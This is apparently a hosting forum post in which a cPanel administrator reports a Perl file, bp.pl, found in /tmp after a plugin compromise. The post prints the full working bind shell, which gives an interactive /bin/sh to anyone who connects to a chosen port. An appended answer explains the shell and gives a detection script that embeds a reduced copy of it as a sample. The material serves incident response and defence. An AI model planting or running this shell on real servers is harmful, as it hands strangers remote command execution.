bp.pl in /tmp folder

Hi,

I run a cPanel server and host a few customers.

I noticed the following bp.pl file in the /tmp folder today:

#!/usr/bin/perl
# Classic Perl bind shell: listens on the TCP port given as the first argument
# and hands every client that connects an interactive /bin/sh.
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }        # needs a port number, otherwise exits quietly
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);   # lets it rebind the port immediately after a restart
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";   # binds on all interfaces
listen(S,3) || die "Cant listen port\n";
while(1) {
        accept(CONN,S);                  # block until a client connects
        if(!($pid=fork)) {               # child serves the client, parent keeps accepting
                die "Cannot fork" if (!defined $pid);
                open STDIN,"<&CONN";     # wire the shell's stdin/stdout/stderr to the socket
                open STDOUT,">&CONN";
                open STDERR,">&CONN";
                exec $SHELL || die print CONN "Cant execute $SHELL\n";   # replaces the child with the shell
                close CONN;
                exit 0;
        }
}

Seems to be some kind of shell.

I tried LMD scanning the user owning the bp.pl file and observed that it is hacked through his plugin.

I have suspended the user now and contacted him.

What is this shell? What else should I do now?

Thanks for all your time.
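The script above is a TCP bind shell: started as `perl bp.pl PORT`, it listens on that port on every interface and gives anyone who connects an interactive /bin/sh running as the owning user. Two things a practitioner would want to check next are whether an instance is actually running (a perl process holding a LISTEN socket) and whether other copies or variants are lying around in world-writable directories. The following triage script is an added example, not part of the original post or of cPanel/LMD; it assumes a Linux host with POSIX sh, find, grep and iproute2's ss, and the sample file it writes is a constructed copy of the indicator-bearing lines of bp.pl, used only so the scanner has something to find.

```shell
#!/bin/sh
# Added triage example (not from the original post). Assumes POSIX sh, find,
# grep with -E, and iproute2's ss for the live-socket check.

# Score one file by the indicators a socket bind shell cannot do without:
# create/bind/listen/accept a socket, tie STDIN/STDOUT to the connection,
# and exec a shell. Each indicator counts once, so the score is 0..8.
bind_shell_indicators() {
    f="$1"; n=0
    set -- 'socket\(' 'bind\(' 'listen\(' 'accept\(' 'STDIN' 'STDOUT' \
           'exec[[:space:]]' '/bin/(ba)?sh'
    for pat in "$@"; do
        if grep -qE -- "$pat" "$f" 2>/dev/null; then n=$((n+1)); fi
    done
    echo "$n"
}

# Walk a directory (e.g. /tmp, /var/tmp, /dev/shm) and print "score<TAB>path"
# for every file scoring at least the threshold (default 6 of 8).
find_bind_shells() {
    dir="$1"; threshold="${2:-6}"
    find "$dir" -type f 2>/dev/null | while IFS= read -r f; do
        s=$(bind_shell_indicators "$f")
        if [ "$s" -ge "$threshold" ]; then printf '%s\t%s\n' "$s" "$f"; fi
    done
}

# Live check: a running bp.pl only listens when started with a port argument,
# so it shows up as a perl (or sh/python) process owning a LISTEN socket.
listening_script_interpreters() {
    ss -ltnp 2>/dev/null | grep -E 'users:\(\("(perl|python[0-9.]*|sh|bash)"'
}

# Constructed sample for demonstration: the indicator-bearing lines of the
# bp.pl from the post, plus a harmless file, written into the given directory.
write_constructed_sample() {
    cat > "$1/bp.pl" <<'EOF'
#!/usr/bin/perl
$SHELL="/bin/sh -i";
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp'));
bind(S,sockaddr_in($ARGV[0],INADDR_ANY));
listen(S,3);
accept(CONN,S);
open STDIN,"<&CONN"; open STDOUT,">&CONN"; open STDERR,">&CONN";
exec $SHELL;
EOF
    printf 'session data, nothing to see\n' > "$1/sess_abc.txt"
}

# Run against the constructed sample: `sh triage.sh demo`.
# For a real host use: find_bind_shells /tmp; find_bind_shells /var/tmp;
# listening_script_interpreters
demo() {
    d=$(mktemp -d)
    write_constructed_sample "$d"
    find_bind_shells "$d"          # prints only the bp.pl line, score 8
    rm -rf "$d"
}

if [ "${1:-}" = demo ]; then demo; fi
```

The threshold of 6 is deliberately below the full 8 so that variants using bash instead of sh, or skipping the STDERR line, are still flagged, while an ordinary CGI script that only mentions STDIN and STDOUT stays well under it. A hit from either check is a reason to capture the process (its command line, working directory, and the port it bound) before killing it, since the port and start time are what tie it back to the web-server and FTP logs of the compromised account.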
